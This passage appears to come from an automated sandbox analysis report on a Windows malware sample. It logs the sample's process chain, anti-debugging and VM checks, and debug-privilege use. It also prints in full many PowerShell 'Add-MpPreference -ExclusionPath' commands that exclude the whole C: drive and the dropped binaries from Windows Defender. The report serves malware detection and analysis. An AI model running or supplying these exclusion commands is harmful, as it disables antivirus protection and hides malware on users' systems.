                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 593891
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 593701
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 593500
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 593228
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 592937
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 592453
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 592000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 591641
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 591125
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 590625
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 590297
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 589906
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 589281
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 588844
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 588266
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 587902
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 587563
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 586547
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 586156
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 585703
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 585360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 584840
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 584360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 584050
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 583281
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 583028
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582906
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582531
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582281
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582100
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581984
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581864
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581725
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581621
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581487
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581240
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581031
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580875
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580738
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580610
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580485
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580358
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580235
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580037
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579899
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579773
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579669
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579547
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579422
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579312
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579203
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: wscript.exe, 00000001.00000003.1722778822.0000000002742000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: serverDll.exe, 00000004.00000002.2356506361.000000001B9AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: serverDll.exe, 00000004.00000002.2356506361.000000001B9AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: w32tm.exe, 00000048.00000002.1903412353.0000024B410E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeAPI call chain: ExitProcess graph end nodegraph_0-23924
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A4F838
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A57DEE mov eax, dword ptr fs:[00000030h]0_2_00A57DEE
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A5C030 GetProcessHeap,0_2_00A5C030
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeProcess token adjusted: Debug
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\Memory Compression.exeProcess token adjusted: Debug
                                    Source: C:\Recovery\Memory Compression.exeProcess token adjusted: Debug
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess token adjusted: Debug
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess token adjusted: Debug
                                    Source: C:\Users\Default\Videos\System.exeProcess token adjusted: Debug
                                    Source: C:\Users\Default\Videos\System.exeProcess token adjusted: Debug
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A4F838
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4F9D5 SetUnhandledExceptionFilter,0_2_00A4F9D5
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A4FBCA
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A58EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A58EBD
                                    Source: C:\ChainbrowserNet\serverDll.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Adds a directory exclusion to Windows Defender
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ChainbrowserNet/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\Memory Compression.exe'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\backgroundTaskHost.exe'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Videos\System.exe'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\upfc.exe'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\serverDll.exe'
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ChainbrowserNet/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\Memory Compression.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\backgroundTaskHost.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Videos\System.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\upfc.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\serverDll.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainbrowserNet\Fsnwm63YgSc5SNPvS73lTcLZ0fh.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ChainbrowserNet\serverDll.exe "C:\ChainbrowserNet/serverDll.exe"Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ChainbrowserNet/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\Memory Compression.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\backgroundTaskHost.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Videos\System.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\upfc.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\serverDll.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ff39zMQKS5.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ChainbrowserNet\backgroundTaskHost.exe "C:\ChainbrowserNet\backgroundTaskHost.exe"
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: 0_2_00A4F654 cpuid 0_2_00A4F654
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00A4AF0F
                                    Source: C:\ChainbrowserNet\serverDll.exeQueries volume information: C:\ChainbrowserNet\serverDll.exe VolumeInformationJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
